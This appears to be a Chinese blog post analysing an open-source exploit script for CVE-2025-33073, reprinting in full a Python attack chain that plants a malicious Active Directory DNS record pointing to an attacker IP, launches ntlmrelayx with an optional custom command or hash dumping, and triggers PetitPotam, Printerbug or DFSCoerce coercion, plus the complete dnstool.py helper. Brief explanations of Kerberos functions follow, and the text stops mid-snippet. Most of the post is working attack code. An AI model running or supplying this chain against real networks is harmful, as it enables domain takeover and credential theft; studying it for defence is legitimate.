" /> " />

目 录CONTENT

文章目录

CVE-2025-33073 漏洞利用自动化脚本分析

Octal
2025-06-22 / 0 评论 / 0 点赞 / 31 阅读 / 0 字
温馨提示:
部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

小黑猫开源地址:https://github.com/mverschu/CVE-2025-33073?tab=readme-ov-file

CVE-2025-33073.py 源代码

#!/usr/bin/env python3
import shlex
import sys
import argparse
import subprocess
import time

STATIC_DNS_RECORD = "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"

def run_dnstool(user, password, attacker_ip, dns_ip, dc_fqdn):
    print("[*] Adding malicious DNS record using dnstool.py...")
    dnstool_cmd = [
        "python3", "dnstool.py",
        "-u", user,
        "-p", password,
        "-a", "add",
        "-r", STATIC_DNS_RECORD,
        "-d", attacker_ip,
        "-dns-ip", dns_ip,
        dc_fqdn
    ]
    subprocess.run(dnstool_cmd, check=True)
    print("[+] DNS record added.")

def wait_for_dns_record(record, dns_ip, timeout=60):
    timeout = int(timeout)
    print(f"[*] Waiting for DNS record {record} to propagate...")
    start_time = time.time()
    while time.time() - start_time < timeout:
        try:
            result = subprocess.run(
                ["dig", "+short", record, f"@{dns_ip}"],
                capture_output=True, text=True
            )
            if result.stdout.strip():
                print("[+] DNS record is live.")
                return True
        except Exception as e:
            print(f"[!] Error checking DNS record: {e}")
        time.sleep(2)
    print("[!] Timeout reached. DNS record not found.")
    return False

def start_ntlmrelayx(target, cli_only=False, custom_command=None, socks=False):
    if cli_only:
        print("[*] Starting ntlmrelayx listener in this terminal...")
        if custom_command:
            # 加入 -c 选项 执行 指定命令
            cmd = ["impacket-ntlmrelayx", "-t", target, "-smb2support", "-c", custom_command]
        else:
            # 获取 被 攻击机 的 uid:rid:lmhash:nthash
            cmd = ["impacket-ntlmrelayx", "-t", target, "-smb2support"]
        if socks:
            cmd.append("-socks")
            # subprocess.Popen 主要用于启动子进程并与其进行交互。
        return subprocess.Popen(cmd)
    else:
        print("[*] Starting ntlmrelayx listener in a new xterm...")
        if custom_command:
            cmd = ["xterm", "-hold", "-e", "impacket-ntlmrelayx", "-t", target, "-smb2support", "-c", custom_command]
        else:
            cmd = ["xterm", "-hold", "-e", "impacket-ntlmrelayx", "-t", target, "-smb2support"]
        if socks:
            cmd.append("--socks")
        return subprocess.Popen(cmd)

def run_petitpotam(target_ip, domain, user, password, cli_only=False, method="PetitPotam"):
    print(f"[*] Triggering {method} coercion via nxc...")

    command_str = (
        f"nxc smb {target_ip} "
        f"-d {domain} "
        f"-u {user} "
        f"-p '{password}' "
        f"-M coerce_plus "
        f"-o M={method} L=\"{STATIC_DNS_RECORD}\""
    )

    if cli_only:
        print(f"[*] Running {method} silently in this terminal...")
        subprocess.Popen(
            command_str, 
            shell=True,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL
        )
    else:
        print(f"[*] Running {method} in a new xterm...")
        subprocess.Popen(["xterm", "-e", "bash", "-c", command_str])

def main():
    parser = argparse.ArgumentParser(description="Ethical attack chain: dnstool + ntlmrelayx + coercion method")
    parser.add_argument("-u", "--username", required=True, help="Username (DOMAIN\\user)")
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("-d", "--attacker-ip", required=True, help="Attacker IP (Linux/Kali machine)")
    parser.add_argument("--dns-ip", required=True, help="IP of Domain Controller (DNS)")
    parser.add_argument("--dc-fqdn", required=True, help="FQDN of the Domain Controller")
    parser.add_argument("--target", required=True, help="Target machine for NTLM relay (FQDN)")
    parser.add_argument("--target-ip", required=True, help="IP of the coercion target (for nxc)")
    parser.add_argument("--cli-only", action="store_true", help="Run everything in CLI without opening xterm windows")
    parser.add_argument("--custom-command", help="Run custom command instead of secretsdump")
    parser.add_argument("--socks", action="store_true", help="Enable SOCKS proxy in ntlmrelayx")
    parser.add_argument("-M", "--method", default="PetitPotam", 
                        choices=["PetitPotam", "Printerbug", "DFSCoerce"],
                        help="Coercion method to use (default: PetitPotam)")
    args = parser.parse_args()

    # Step 1: Add DNS record (static record inside)
    run_dnstool(args.username, args.password, args.attacker_ip, args.dns_ip, args.dc_fqdn)

    # Step 2: Check if DNS record was added succesfully
    domain_name = ".".join(args.dc_fqdn.split(".")[1:])
    full_record = f"{STATIC_DNS_RECORD}.{domain_name}"
    if not wait_for_dns_record(full_record, args.dns_ip, timeout=60):
        print("[!] Exiting due to DNS record not being live.")
        sys.exit(1)
    
    # Step 3: Start ntlmrelayx listener
    ntlmrelay_proc = start_ntlmrelayx(args.target, args.cli_only, args.custom_command, args.socks)
    time.sleep(5)  # Give ntlmrelayx some time to start

    # Step 4: Trigger coercion method
    domain, user = args.username.split("\\", 1)
    run_petitpotam(args.target_ip, domain, user, args.password, args.cli_only, args.method)

    print("[*] Exploit chain triggered.")
    if args.cli_only:
        print("[*] Running in CLI-only mode. Check this terminal for output.")
        try:
            ntlmrelay_proc.wait()
        except KeyboardInterrupt:
            print("\n[*] Keyboard interrupt received. Stopping...")
            ntlmrelay_proc.terminate()
    else:
        print("[*] Check both terminals for output.")
        input("[*] Press Enter to stop ntlmrelayx listener...")
        ntlmrelay_proc.terminate()
        ntlmrelay_proc.wait()

if __name__ == "__main__":
    main()

dnstool.py 源代码

#!/usr/bin/env python
####################
#
# Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Tool to interact with ADIDNS over LDAP
# 
####################
import sys
import argparse
import getpass
import re
import os
import socket
from struct import unpack, pack
from impacket.structure import Structure
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal
from impacket.krb5 import constants
from ldap3 import NTLM, Server, Connection, ALL, LEVEL, BASE, MODIFY_DELETE, MODIFY_ADD, MODIFY_REPLACE, SASL, KERBEROS
from lib.utils.kerberos import ldap_kerberos
import ldap3
from impacket.ldap import ldaptypes
import dns.resolver
import datetime

def print_m(string):
    sys.stderr.write('\033[94m[-]\033[0m %s\n' % (string))

def print_o(string):
    sys.stderr.write('\033[92m[+]\033[0m %s\n' % (string))

def print_f(string):
    sys.stderr.write('\033[91m[!]\033[0m %s\n' % (string))



class DNS_RECORD(Structure):
    """
    dnsRecord - used in LDAP
    [MS-DNSP] section 2.3.2.2
    """
    structure = (
        ('DataLength', '<H-Data'),
        ('Type', '<H'),
        ('Version', 'B=5'),
        ('Rank', 'B'),
        ('Flags', '<H=0'),
        ('Serial', '<L'),
        ('TtlSeconds', '>L'),
        ('Reserved', '<L=0'),
        ('TimeStamp', '<L=0'),
        ('Data', ':')
    )

# Note that depending on whether we use RPC or LDAP all the DNS_RPC_XXXX
# structures use DNS_RPC_NAME when communication is over RPC,
# but DNS_COUNT_NAME is the way they are stored in LDAP.
#
# Since LDAP is the primary goal of this script we use that, but for use
# over RPC the DNS_COUNT_NAME in the structures must be replaced with DNS_RPC_NAME,
# which is also consistent with how MS-DNSP describes it.

class DNS_RPC_NAME(Structure):
    """
    DNS_RPC_NAME
    Used for FQDNs in RPC communication.
    MUST be converted to DNS_COUNT_NAME for LDAP
    [MS-DNSP] section 2.2.2.2.1
    """
    structure = (
        ('cchNameLength', 'B-dnsName'),
        ('dnsName', ':')
    )

class DNS_COUNT_NAME(Structure):
    """
    DNS_COUNT_NAME
    Used for FQDNs in LDAP communication
    MUST be converted to DNS_RPC_NAME for RPC communication
    [MS-DNSP] section 2.2.2.2.2
    """
    structure = (
        ('Length', 'B-RawName'),
        ('LabelCount', 'B'),
        ('RawName', ':')
    )

    def toFqdn(self):
        ind = 0
        labels = []
        for i in range(self['LabelCount']):
            nextlen = unpack('B', self['RawName'][ind:ind+1])[0]
            labels.append(self['RawName'][ind+1:ind+1+nextlen].decode('utf-8'))
            ind += nextlen + 1
        # For the final dot
        labels.append('')
        return '.'.join(labels)

class DNS_RPC_NODE(Structure):
    """
    DNS_RPC_NODE
    [MS-DNSP] section 2.2.2.2.3
    """
    structure = (
        ('wLength', '>H'),
        ('wRecordCount', '>H'),
        ('dwFlags', '>L'),
        ('dwChildCount', '>L'),
        ('dnsNodeName', ':')
    )

class DNS_RPC_RECORD_A(Structure):
    """
    DNS_RPC_RECORD_A
    [MS-DNSP] section 2.2.2.2.4.1
    """
    structure = (
        ('address', ':'),
    )

    def formatCanonical(self):
        return socket.inet_ntoa(self['address'])

    def fromCanonical(self, canonical):
        self['address'] = socket.inet_aton(canonical)


class DNS_RPC_RECORD_NODE_NAME(Structure):
    """
    DNS_RPC_RECORD_NODE_NAME
    [MS-DNSP] section 2.2.2.2.4.2
    """
    structure = (
        ('nameNode', ':', DNS_COUNT_NAME),
    )

class DNS_RPC_RECORD_SOA(Structure):
    """
    DNS_RPC_RECORD_SOA
    [MS-DNSP] section 2.2.2.2.4.3
    """
    structure = (
        ('dwSerialNo', '>L'),
        ('dwRefresh', '>L'),
        ('dwRetry', '>L'),
        ('dwExpire', '>L'),
        ('dwMinimumTtl', '>L'),
        ('namePrimaryServer', ':', DNS_COUNT_NAME),
        ('zoneAdminEmail', ':', DNS_COUNT_NAME)
    )

class DNS_RPC_RECORD_NULL(Structure):
    """
    DNS_RPC_RECORD_NULL
    [MS-DNSP] section 2.2.2.2.4.4
    """
    structure = (
        ('bData', ':'),
    )

# Some missing structures here that I skipped

class DNS_RPC_RECORD_NAME_PREFERENCE(Structure):
    """
    DNS_RPC_RECORD_NAME_PREFERENCE
    [MS-DNSP] section 2.2.2.2.4.8
    """
    structure = (
        ('wPreference', '>H'),
        ('nameExchange', ':', DNS_COUNT_NAME)
    )

# Some missing structures here that I skipped

class DNS_RPC_RECORD_AAAA(Structure):
    """
    DNS_RPC_RECORD_AAAA
    [MS-DNSP] section 2.2.2.2.4.17
    [MS-DNSP] section 2.2.2.2.4.17
    """
    structure = (
        ('ipv6Address', '16s'),
    )

class DNS_RPC_RECORD_SRV(Structure):
    """
    DNS_RPC_RECORD_SRV
    [MS-DNSP] section 2.2.2.2.4.18
    """
    structure = (
        ('wPriority', '>H'),
        ('wWeight', '>H'),
        ('wPort', '>H'),
        ('nameTarget', ':', DNS_COUNT_NAME)
    )

class DNS_RPC_RECORD_TS(Structure):
    """
    DNS_RPC_RECORD_TS
    [MS-DNSP] section 2.2.2.2.4.23
    """
    structure = (
        ('entombedTime', '<Q'),
    )
    def toDatetime(self):
        microseconds = self['entombedTime'] / 10.
        return datetime.datetime(1601,1,1) + datetime.timedelta(microseconds=microseconds)

def get_dns_zones(connection, root, attr="dc"):
    connection.search(root, '(objectClass=dnsZone)', search_scope=LEVEL, attributes=[attr])
    zones = []
    for entry in connection.response:
        if entry['type'] != 'searchResEntry':
            continue
        zones.append(entry['attributes'][attr])
    return zones

def get_next_serial(dnsserver, dc, zone, tcp):
    # Create a resolver object
    dnsresolver = dns.resolver.Resolver()
    # Check if DNS-server is present
    if dnsserver:
       server = dnsserver
    else:
        server = dc
   

    # Is our host an IP? In that case make sure the server IP is used
    # if not assume lookups are working already
    try:
        socket.inet_aton(server)
        dnsresolver.nameservers = [server]
        
    except socket.error:
        pass
    res = dnsresolver.resolve(zone, 'SOA',tcp=tcp)
    for answer in res:
        return answer.serial + 1

def ldap2domain(ldap):
    return re.sub(',DC=', '.', ldap[ldap.find('DC='):], flags=re.I)[3:]

def print_record(record, ts=False):
    try:
        rtype = RECORD_TYPE_MAPPING[record['Type']]
    except KeyError:
        rtype = 'Unsupported'
    if ts:
        print('Record is tombStoned (inactive)')
    print_o('Record entry:')
    print(' - Type: %d (%s) (Serial: %d)' % (record['Type'], rtype, record['Serial']))
    if record['Type'] == 0:
        tstime = DNS_RPC_RECORD_TS(record['Data'])
        print(' - Tombstoned at: %s' % tstime.toDatetime())
    # A record
    if record['Type'] == 1:
        address = DNS_RPC_RECORD_A(record['Data'])
        print(' - Address: %s' % address.formatCanonical())
    # NS record or CNAME record
    if record['Type'] == 2 or record['Type'] == 5:
        address = DNS_RPC_RECORD_NODE_NAME(record['Data'])
        # address.dump()
        print(' - Address: %s' %  address['nameNode'].toFqdn())
    # SRV record
    if record['Type'] == 33:
        record_data = DNS_RPC_RECORD_SRV(record['Data'])
        # record_data.dump()
        print(' - Priority: %d' %  record_data['wPriority'])
        print(' - Weight: %d' %  record_data['wWeight'])
        print(' - Port: %d' %  record_data['wPort'])
        print(' - Name: %s' %  record_data['nameTarget'].toFqdn())
    # SOA record
    if record['Type'] == 6:
        record_data = DNS_RPC_RECORD_SOA(record['Data'])
        # record_data.dump()
        print(' - Serial: %d' %  record_data['dwSerialNo'])
        print(' - Refresh: %d' %  record_data['dwRefresh'])
        print(' - Retry: %d' %  record_data['dwRetry'])
        print(' - Expire: %d' %  record_data['dwExpire'])
        print(' - Minimum TTL: %d' %  record_data['dwMinimumTtl'])
        print(' - Primary server: %s' %  record_data['namePrimaryServer'].toFqdn())
        print(' - Zone admin email: %s' %  record_data['zoneAdminEmail'].toFqdn())

def new_record(rtype, serial):
    nr = DNS_RECORD()
    nr['Type'] = rtype
    nr['Serial'] = serial
    nr['TtlSeconds'] = 180
    # From authoritive zone
    nr['Rank'] = 240
    return nr

def print_operation_result(result):
    if result['result'] == 0:
        print_o('LDAP operation completed successfully')
        return True
    else:
        print_f('LDAP operation failed. Message returned from server: %s %s' %  (result['description'], result['message']))
        return False

RECORD_TYPE_MAPPING = {
    0: 'ZERO',
    1: 'A',
    2: 'NS',
    5: 'CNAME',
    6: 'SOA',
    33: 'SRV',
    65281: 'WINS'
}

def main():
    parser = argparse.ArgumentParser(description='Query/modify DNS records for Active Directory integrated DNS via LDAP')
    parser._optionals.title = "Main options"
    parser._positionals.title = "Required options"

    #Main parameters
    #maingroup = parser.add_argument_group("Main options")
    parser.add_argument("host", type=str,metavar='HOSTNAME',help="Hostname/ip or ldap://host:port connection string to connect to")
    parser.add_argument("-u","--user",type=str,metavar='USERNAME',help="DOMAIN\\username for authentication.")
    parser.add_argument("-p","--password",type=str,metavar='PASSWORD',help="Password or LM:NTLM hash, will prompt if not specified")
    parser.add_argument("--forest", action='store_true', help="Search the ForestDnsZones instead of DomainDnsZones")
    parser.add_argument("--legacy", action='store_true', help="Search the System partition (legacy DNS storage)")
    parser.add_argument("--zone", help="Zone to search in (if different than the current domain)")
    parser.add_argument("--print-zones", action='store_true', help="Only query all zones on the DNS server, no other modifications are made")
    parser.add_argument("--print-zones-dn", action='store_true', help="Query and print the Distinguished Names of all zones on the DNS server")
    parser.add_argument("--tcp", action='store_true', help="use DNS over TCP")
    parser.add_argument('-k', '--kerberos', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                        '(KRB5CCNAME) based on target parameters. If valid credentials '
                        'cannot be found, it will use the ones specified in the command '
                        'line')
    parser.add_argument('-port', default=389, metavar="port", type=int, help='LDAP port, default value is 389')
    parser.add_argument('-force-ssl', action='store_true', default=False, help='Force SSL when connecting to LDAP server')
    parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
    parser.add_argument('-dns-ip', action="store", metavar="ip address", help='IP Address of a DNS Server')
    parser.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication '
                                                                          '(128 or 256 bits)')
    recordopts = parser.add_argument_group("Record options")
    recordopts.add_argument("-r", "--record", type=str, metavar='TARGETRECORD', help="Record to target (FQDN)")
    recordopts.add_argument("-a",
                        "--action",
                        choices=['add', 'modify', 'query', 'remove', 'resurrect', 'ldapdelete'],
                        default='query',
                        help="Action to perform. Options: add (add a new record), modify ("
                             "modify an existing record), query (show existing), remove (mark record "
                             "for cleanup from DNS cache), delete (delete from LDAP). Default: query"
                        )
    recordopts.add_argument("-t", "--type", choices=['A'], default='A', help="Record type to add (Currently only A records supported)")
    recordopts.add_argument("-d", "--data", metavar='RECORDDATA', help="Record data (IP address)")
    recordopts.add_argument("--allow-multiple", action='store_true', help="Allow multiple A records for the same name")
    recordopts.add_argument("--ttl", type=int, default=180, help="TTL for record (default: 180)")



    args = parser.parse_args()

    #Prompt for password if not set
    authentication = None
    if not args.user or not '\\' in args.user:
        print_f('Username must include a domain, use: DOMAIN\\username')
        sys.exit(1)
    domain, user = args.user.split('\\', 1)
    if not args.kerberos:
        authentication = NTLM
        sasl_mech = None
        if args.password is None:
            args.password = getpass.getpass()
    else:
        TGT = None
        TGS = None
        try:
            # Hashes
            lmhash, nthash = args.password.split(':')
            assert len(nthash) == 32
            password = ''
        except:
            # Password
            lmhash = ''
            nthash = ''
            password = args.password
        if 'KRB5CCNAME' in os.environ and os.path.exists(os.environ['KRB5CCNAME']):
            domain, user, TGT, TGS = CCache.parseFile(domain, user, 'ldap/%s' % args.host)
        if args.dc_ip is None:
            kdcHost = domain
        else:
            kdcHost = args.dc_ip
        userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        if not TGT and not TGS:
            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, args.aesKey, kdcHost)
        elif TGT:
            # Has TGT
            tgt = TGT['KDC_REP']
            cipher = TGT['cipher']
            sessionKey = TGT['sessionKey']
        if not TGS:
            # Request TGS
            serverName = Principal('ldap/%s' % args.host, type=constants.PrincipalNameType.NT_SRV_INST.value)
            TGS = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey)
        else:
            # Convert to tuple expected
            TGS = (TGS['KDC_REP'], TGS['cipher'], TGS['sessionKey'], TGS['sessionKey'])
        authentication = SASL
        sasl_mech = KERBEROS

    # define the server and the connection
    s = Server(args.host, port=args.port, use_ssl=args.force_ssl, get_info=ALL)
    print_m('Connecting to host...')
    c = Connection(s, user=args.user, password=args.password, authentication=authentication, sasl_mechanism=sasl_mech)
    print_m('Binding to host')
    # perform the Bind operation
    if authentication == NTLM:
        if not c.bind():
            print_f('Could not bind with specified credentials')
            print_f(c.result)
            sys.exit(1)
    else:
        ldap_kerberos(domain, kdcHost, None, userName, c, args.host, TGS)
    print_o('Bind OK')
    domainroot = s.info.other['defaultNamingContext'][0]
    forestroot = s.info.other['rootDomainNamingContext'][0]
    if args.forest:
        dnsroot = 'CN=MicrosoftDNS,DC=ForestDnsZones,%s' % forestroot
    else:
        if args.legacy:
            dnsroot = 'CN=MicrosoftDNS,CN=System,%s' % domainroot
        else:
            dnsroot = 'CN=MicrosoftDNS,DC=DomainDnsZones,%s' % domainroot

    if args.print_zones or args.print_zones_dn:
        if args.print_zones_dn:
            attr = "distinguishedName"
        else:
            attr = "dc"
        zones = get_dns_zones(c, dnsroot,attr)
        if len(zones) > 0:
            print_m('Found %d domain DNS zones:' % len(zones))
            for zone in zones:
                print('    %s' % zone)
        forestdns = 'CN=MicrosoftDNS,DC=ForestDnsZones,%s' % s.info.other['rootDomainNamingContext'][0]
        zones = get_dns_zones(c, forestdns,attr)
        if len(zones) > 0:
            print_m('Found %d forest DNS zones:' % len(zones))
            for zone in zones:
                print('    %s' % zone)
        return

    
    target = args.record
    if args.zone:
        zone = args.zone
    else:
        # Default to current domain
        zone = ldap2domain(domainroot)

    if not target:
        print_f('You need to specify a target record')
        return

    if target.lower().endswith(zone.lower()):
        target = target[:-(len(zone)+1)]


    searchtarget = 'DC=%s,%s' % (zone, dnsroot)
    # print s.info.naming_contexts
    c.search(searchtarget, '(&(objectClass=dnsNode)(name=%s))' % ldap3.utils.conv.escape_filter_chars(target), attributes=['dnsRecord','dNSTombstoned','name'])
    targetentry = None
    for entry in c.response:
        if entry['type'] != 'searchResEntry':
            continue
        targetentry = entry

    # Check if we have the required data
    if args.action in ['add', 'modify', 'remove'] and not args.data:
        print_f('This operation requires you to specify record data with --data')
        return
    

    # Check if we need the target record to exists, and if yes if it does
    if args.action in ['modify', 'remove', 'ldapdelete', 'resurrect', 'query'] and not targetentry:
        print_f('Target record not found!')
        return


    if args.action == 'query':
        print_o('Found record %s' % targetentry['attributes']['name'])
        for record in targetentry['raw_attributes']['dnsRecord']:
            dr = DNS_RECORD(record)
            # dr.dump()
            print(targetentry['dn'])
            print_record(dr, targetentry['attributes']['dNSTombstoned'])
            continue
    elif args.action == 'add':
        # Only A records for now
        addtype = 1
        # Entry exists
        if targetentry:
            if not args.allow_multiple:
                for record in targetentry['raw_attributes']['dnsRecord']:
                    dr = DNS_RECORD(record)
                    if dr['Type'] == 1:
                        address = DNS_RPC_RECORD_A(dr['Data'])
                        print_f('Record already exists and points to %s. Use --action modify to overwrite or --allow-multiple to override this' % address.formatCanonical())
                        return False
            # If we are here, no A records exists yet
            record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp))
            record['Data'] = DNS_RPC_RECORD_A()
            record['Data'].fromCanonical(args.data)
            print_m('Adding extra record')
            c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_ADD, record.getData())]})
            print_operation_result(c.result)
        else:
            node_data = {
                # Schema is in the root domain (take if from schemaNamingContext to be sure)
                'objectCategory': 'CN=Dns-Node,%s' % s.info.other['schemaNamingContext'][0],
                'dNSTombstoned': False,
                'name': target
            }
            record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp))
            record['Data'] = DNS_RPC_RECORD_A()
            record['Data'].fromCanonical(args.data)
            record_dn = 'DC=%s,%s' % (target, searchtarget)
            node_data['dnsRecord'] = [record.getData()]
            print_m('Adding new record')
            c.add(record_dn, ['top', 'dnsNode'], node_data)
            print_operation_result(c.result)
    elif args.action == 'modify':
        # Only A records for now
        addtype = 1
        # We already know the entry exists
        targetrecord = None
        records = []
        for record in targetentry['raw_attributes']['dnsRecord']:
            dr = DNS_RECORD(record)
            if dr['Type'] == 1:
                targetrecord = dr
            else:
                records.append(record)
        if not targetrecord:
            print_f('No A record exists yet. Use --action add to add it')
        targetrecord['Serial'] = get_next_serial(args.dns_ip, args.host, zone,args.tcp)
        targetrecord['Data'] = DNS_RPC_RECORD_A()
        targetrecord['Data'].fromCanonical(args.data)
        records.append(targetrecord.getData())
        print_m('Modifying record')
        c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, records)]})
        print_operation_result(c.result)
    elif args.action == 'remove':
        addtype = 0
        if len(targetentry['raw_attributes']['dnsRecord']) > 1:
            print_m('Target has multiple records, removing the one specified')
            targetrecord = None
            for record in targetentry['raw_attributes']['dnsRecord']:
                dr = DNS_RECORD(record)
                if dr['Type'] == 1:
                    tr = DNS_RPC_RECORD_A(dr['Data'])
                    if tr.formatCanonical() == args.data:
                        targetrecord = record
            if not targetrecord:
                print_f('Could not find a record with the specified data')
                return
            c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_DELETE, targetrecord)]})
            print_operation_result(c.result)
        else:
            print_m('Target has only one record, tombstoning it')
            diff = datetime.datetime.today() - datetime.datetime(1601,1,1)
            tstime = int(diff.total_seconds()*10000)
            # Add a null record
            record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp))
            record['Data'] = DNS_RPC_RECORD_TS()
            record['Data']['entombedTime'] = tstime
            c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, [record.getData()])],
                                         'dNSTombstoned': [(MODIFY_REPLACE, True)]})
            print_operation_result(c.result)
    elif args.action == 'ldapdelete':
        print_m('Deleting record over LDAP')
        c.delete(targetentry['dn'])
        print_operation_result(c.result)
    elif args.action == 'resurrect':
         addtype = 0
         if len(targetentry['raw_attributes']['dnsRecord']) > 1:
             print_m('Target has multiple records, I dont  know how to handle this.')
             return
         else:
             print_m('Target has only one record, resurrecting it')
             diff = datetime.datetime.today() - datetime.datetime(1601,1,1)
             tstime = int(diff.total_seconds()*10000)
             # Add a null record
             record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp))
             record['Data'] = DNS_RPC_RECORD_TS()
             record['Data']['entombedTime'] = tstime
             c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, [record.getData()])],
                                          'dNSTombstoned': [(MODIFY_REPLACE, False)]})
             print_o('Record resurrected. You will need to (re)add the record with the IP address.')

if __name__ == '__main__':
    main()

相关重要函数调用解释

#Principal

在编程和计算机科学领域,“Principal”(主体)这个概念主要用于安全和权限管理等方面

作用有如下几个方面:

一、安全认证场景

  1. 表示身份

    • 在安全系统中,Principal 代表了正在请求访问资源的实体,这个实体可以是用户、服务或者进程等。例如,在一个基于 Kerberos 的认证系统中,当用户使用用户名和密码进行认证后,系统会创建一个代表该用户身份的 Principal 对象。这个 Principal 对象就像是用户在这个安全环境中的 “名片”,它包含了用户的身份信息,如用户名等。

    • 对于服务来说,一个提供 Web 服务的服务器可以作为一个 Principal。当它向其他服务请求资源时,其 Principal 身份可以表明它是一个可信的服务主体,拥有特定的权限来访问其他服务的接口。

  2. 权限管理基础

    • Principal 是权限管理的基础。安全系统根据 Principal 的身份来决定它能够访问哪些资源以及能够执行哪些操作。例如,在一个文件系统中,不同的用户(Principal)可能被授予不同的文件访问权限。管理员用户(Principal)可能有读写和删除文件的权限,而普通用户(Principal)可能只有读取文件的权限。

    • 在基于角色的访问控制(RBAC)系统中,Principal 会被分配不同的角色,而每个角色对应着一组权限。通过管理 Principal 的角色分配,可以方便地控制其对资源的访问。例如,在一个企业资源规划(ERP)系统中,销售人员(Principal)被分配 “销售” 角色,该角色允许他们访问客户订单信息,但不允许修改财务数据。

  3. 审计和安全监控

    • Principal 信息对于安全审计和监控非常重要。在系统日志中,会记录下每个 Principal 的操作行为。例如,当一个用户(Principal)尝试访问一个受保护的数据库时,无论访问成功还是失败,该操作都会被记录下来,包括 Principal 的身份、访问时间、访问的资源等信息。

    • 这有助于安全管理人员追踪潜在的安全威胁。如果发生安全事件,如数据泄露,可以通过分析 Principal 的操作日志来确定是哪个用户或服务导致了问题,从而采取相应的措施,如撤销该 Principal 的权限或者调查其操作意图。

二、分布式系统场景

  1. 服务间通信识别

    • 在分布式系统中,不同的服务之间需要进行通信。Principal 用于识别通信的发起方和服务端。例如,在微服务架构中,一个订单服务(Principal)向库存服务(另一个 Principal)发送库存查询请求。库存服务可以根据订单服务的 Principal 身份来验证其合法性,并决定是否响应请求。

    • 这有助于防止未经授权的服务之间的通信。例如,只有经过认证的购物车服务(Principal)才能向支付服务(Principal)发送支付请求,避免恶意服务伪造支付请求。

  2. 分布式事务管理

    • 在分布式事务中,Principal 可以用于跟踪事务的发起者和参与者。例如,在一个涉及多个服务的分布式事务中,当一个用户(Principal)发起一个转账操作,该操作涉及账户服务、支付网关服务等多个服务。通过记录每个服务在事务中的 Principal 身份,可以在事务出现故障时,准确地回滚每个参与服务的操作,确保数据的一致性。

#getKerberosTGS

getKerberosTGS 函数用于获取服务票据(Service Ticket),是 Kerberos 认证过程中的第二个关键阶段。以下是其具体作用和功能:

### 在 Kerberos 认证流程中的作用

* 获取访问服务所需的票据 :在 Kerberos 认证机制中,客户端若要访问某个网络服务,需先通过认证服务器(AS)获取票据授予票据(TGT),但这只是完成了认证的第一步。接着,客户端需凭借 TGT 向票据授予服务器(TGS)请求访问具体服务的服务票据,`getKerberosTGS` 函数就是用于执行这一步操作,获取服务票据,客户端后续凭借该服务票据才能访问指定的网络服务。

* 遵循 Kerberos 认证协议 :该函数遵循 Kerberos 协议的标准流程,实现了从客户端向 TGS 请求服务票据的逻辑,确保了认证过程的安全性和规范性,使得客户端和服务端能够在安全的环境下进行通信。

### 具体功能

* 参数处理与验证 :接收客户端的相关参数,如服务端名称(`serverName`)、域名(`domain`)、KDC 主机地址(`kdcHost`)、TGT(`tgt`)、加密算法(`cipher`)、会话密钥(`sessionKey`)等。同时,会对这些参数进行必要的处理和验证,确保参数的正确性和完整性,以保证后续请求的顺利进行。

* 构造并发送 TGS_REQ 请求 :根据传入的参数,构造一个 TGS_REQ 请求消息。该消息包含客户端的身份信息、服务端的 SPN(Service Principal Name)、TGT 等重要内容,并使用指定的加密算法和会话密钥对消息中的部分数据进行加密,然后将该请求发送给 KDC 中的 TGS。

* 处理 TGS_REP 响应 :接收 TGS 返回的 TGS_REP 响应消息,并对其进行解码和处理。首先使用会话密钥对响应中的加密部分进行解密,以获取新的会话密钥和服务票据等关键信息。然后,会对获取的服务票据进行验证和解析,确保其有效性,并根据需要返回相关的票据信息,以便后续访问网络服务。

Step 1 添加DNS记录(内含静态记录)

run_dnstool(args.username, args.password, args.attacker_ip, args.dns_ip, args.dc_fqdn)

调用 run_dnstool 函数,然后执行 命令如下。将该dnstool为子进程的方式运行

python3 dnstool.py -u {user} -p {password} -a "add" -r {STATIC_DNS_RECORD} -d {attacker_ip} -dns-ip {dns_ip} {dc_fqdn}

dnstool.py 执行的主要代码块

# Only A records for now
addtype = 1
# Entry exists
if targetentry:
    if not args.allow_multiple:
        for record in targetentry['raw_attributes']['dnsRecord']:
            dr = DNS_RECORD(record)
            if dr['Type'] == 1:
